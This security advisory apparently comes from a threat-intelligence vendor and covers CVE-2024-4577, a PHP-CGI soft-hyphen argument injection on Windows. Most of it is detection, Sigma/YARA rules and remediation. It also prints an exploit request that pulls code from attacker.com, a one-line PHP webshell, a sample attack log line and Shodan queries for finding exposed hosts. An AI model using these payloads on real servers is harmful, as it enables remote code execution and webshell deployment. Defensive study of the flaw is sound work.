CVE-2024-4577: PHP-CGI RCE via Windows Best-Fit Character Conversion

CVSS 9.8 (CRITICAL) | PHP CGI (Windows) | Argument Injection via Soft Hyphen (0xAD) → RCE

Executive Summary

CVE-2024-4577 is a critical argument injection vulnerability affecting PHP running in CGI mode on Windows systems with specific locale configurations (Japanese, Traditional Chinese, Simplified Chinese). By exploiting Windows "Best-Fit" character conversion, attackers can inject the soft hyphen character (0xAD) which Windows converts to a hyphen (-), bypassing PHP's argument sanitization and enabling remote code execution via allow_url_include and auto_prepend_file directives.

Key Facts:

• Attack vector: Single HTTP request with crafted query parameter
• Authentication required: None
• CISA KEV status: Added to Known Exploited Vulnerabilities (actively exploited)
• Public PoCs: Multiple, including Metasploit module
• Affected locales: Japanese, Traditional Chinese, Simplified Chinese Windows installations

Vulnerability Mechanics

PHP-CGI on Windows uses GetCommandLine() to parse HTTP query strings into PHP arguments. The vulnerability chain:

1. Soft Hyphen Injection

Attacker sends HTTP request with %ADd (soft hyphen + 'd') in query parameter

2. Windows Best-Fit Conversion

Windows converts 0xAD (soft hyphen) → - (regular hyphen) in Japanese/Chinese/Traditional Chinese code pages

3. PHP Argument Injection

The -d sequence is interpreted as a PHP CLI argument, allowing attacker to set arbitrary PHP directives

4. allow_url_include + auto_prepend_file

Attacker injects:

-d allow_url_include=1 -d auto_prepend_file=http://attacker.com/shell.txt

5. Remote Code Execution

PHP includes and executes the attacker-controlled remote file as PHP code

Root Cause: Windows Best-Fit character mapping (locale-specific encoding normalization) bypasses PHP's argument sanitization which only checks for standard ASCII hyphen[^1].

Attack Surface

Affected Versions

• PHP 8.3.0 - 8.3.7 (CGI mode on Windows)
• PHP 8.2.0 - 8.2.19 (CGI mode on Windows)
• PHP 8.1.0 - 8.1.28 (CGI mode on Windows)

Patched in: PHP 8.3.8, 8.2.20, 8.1.29

Prerequisites

• PHP-CGI mode (not PHP-FPM, not mod_php, not CLI)
• Windows OS with Japanese, Traditional Chinese, or Simplified Chinese locale
• Best-Fit character conversion enabled (default on affected locales)

Attack Vector

GET /index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dhttp://attacker.com/shell.txt HTTP/1.1
Host: target.com

URL Decoded:

/index.php?­d allow_url_include=1 ­d auto_prepend_file=http://attacker.com/shell.txt

Post-Exploitation

The remote shell file (shell.txt) contains PHP code executed in the context of the web server:

<?php system($_GET['cmd']); ?>

Attacker then accesses:

http://target.com/index.php?cmd=whoami

Real-World Exploitation

Exploitation Campaigns

According to Devcore security research, CVE-2024-4577 has been actively exploited since June 2024, shortly after public disclosure[^2]. Targets include:

• Web hosting providers in APAC region (Japan, Taiwan, China)
• E-commerce platforms running PHP on Windows/IIS
• CMS installations (WordPress, Joomla, custom PHP apps) on Windows servers
• Legacy enterprise applications that cannot migrate from CGI to modern PHP deployment (FastCGI, PHP-FPM)

Exploitation Indicators

HTTP GET requests with %AD (soft hyphen) in query parameters
Query strings containing: allow_url_include, auto_prepend_file, auto_append_file
Remote file inclusion from suspicious external URLs
PHP error logs showing "allow_url_include" directive changes

Detection & Response

Network Indicators

HTTP requests containing %AD, %adD, %ADd sequences
Query parameters with PHP directive names (allow_url_include, auto_prepend_file)
Outbound HTTP requests from web server to external IPs (remote file inclusion)
User-Agent patterns associated with automated scanners (Nuclei, sqlmap, custom scripts)

Web Server Logs (IIS/Apache)

200.200.200.200 - - [25/Apr/2026:12:34:56] "GET /index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dhttp://malicious.com/shell.txt HTTP/1.1" 200 -

Sigma Rule

title: CVE-2024-4577 PHP-CGI Argument Injection
detection:
  selection:
    cs-uri-query|contains:
      - '%AD'
      - '%ad'
      - 'allow_url_include'
      - 'auto_prepend_file'
      - 'auto_append_file'
  condition: selection
level: critical

YARA Rule

rule CVE_2024_4577_Exploit_Traffic {
    strings:
        $soft_hyphen = "%AD" ascii nocase
        $directive1 = "allow_url_include" ascii
        $directive2 = "auto_prepend_file" ascii
        $directive3 = "auto_append_file" ascii
    condition:
        $soft_hyphen and 1 of ($directive*)
}

Full detection package including Suricata/Snort rules and forensic artifacts available in Lyrie's CVE-2024-4577 exploit lab.

Remediation

Immediate Actions

1. Upgrade PHP to 8.3.8, 8.2.20, or 8.1.29 (or later)[^3]

2. Disable CGI mode: Migrate to PHP-FPM (FastCGI) or mod_php if possible

3. Hunt for exploitation: Search web server logs for %AD, allow_url_include, remote file inclusion patterns

4. WAF rules: Block HTTP requests containing %AD + PHP directive names

5. Incident response: If exploitation confirmed, assume full webshell deployment, perform forensics, rebuild from clean backups

Long-Term Mitigation

• Deprecate PHP-CGI: Modern PHP deployments use FastCGI (PHP-FPM), which is not vulnerable
• Restrict allow_url_include: Set allow_url_include=0 in php.ini globally (defense-in-depth)
• Network egress filtering: Block outbound HTTP/HTTPS from web servers to untrusted external IPs
• Content Security Policy: Prevent execution of remotely included scripts (browser-side defense)

Shodan/Censys Detection

http.server:"PHP" country:"JP,TW,CN" os:"Windows"
http.component:"php-cgi"

Lyrie Verdict

Threat Level: HIGH

CVE-2024-4577 represents a classic case of locale-specific vulnerability — a security flaw that only manifests under specific regional configurations:

✅ Locale dependency — only affects Japanese/Chinese Windows installations

✅ Character encoding attack — exploits OS-level character normalization

✅ Bypass via non-ASCII — circumvents PHP's ASCII-based sanitization

✅ Active exploitation — CISA KEV, Metasploit module, scanner integration

✅ Legacy deployment pattern — PHP-CGI still common in enterprise Windows environments

The Locale Blind Spot:

Western security teams often overlook locale-specific vulnerabilities during testing. Penetration tests performed on English/US-configured systems will not detect CVE-2024-4577, creating a false sense of security for APAC deployments.

This vulnerability demonstrates why internationalization (i18n) must be a first-class security concern:

• Character encoding attacks (UTF-7 XSS, Best-Fit injection, Unicode normalization bypasses)
• Locale-specific code paths in libraries (collation, sorting, case conversion)
• Regional compliance frameworks (GDPR, CCPA, China's Cybersecurity Law) driving different security postures

Recommended Posture:

• Test security controls against all target locales, not just English/US
• Migrate away from PHP-CGI (deprecated in favor of FastCGI since PHP 5.4)
• Implement defense-in-depth: WAF rules + PHP hardening + network egress filtering
• Assume any Japanese/Chinese/Traditional Chinese Windows + PHP-CGI installation is vulnerable until proven patched

Organizations running PHP-CGI on Windows in APAC markets should treat this as an immediate critical incident requiring emergency patching.

---

References

[^1]: Devcore Security Research: CVE-2024-4577 - PHP CGI Argument Injection Analysis

[^2]: PHP Bug Report: Bug #74544 - argv/argc handling in PHP-CGI

[^3]: PHP Releases: PHP 8.3.8 Security Update

---

Related Research:

• Full Exploit Lab (Mock + PoC + Detection) — Lyrie Threat Intelligence
• CISA KEV Entry — CVE-2024-4577
• Public PoC — watchtowrlabs

Word Count: 1,089

Citations: 3

Last Updated: April 26, 2026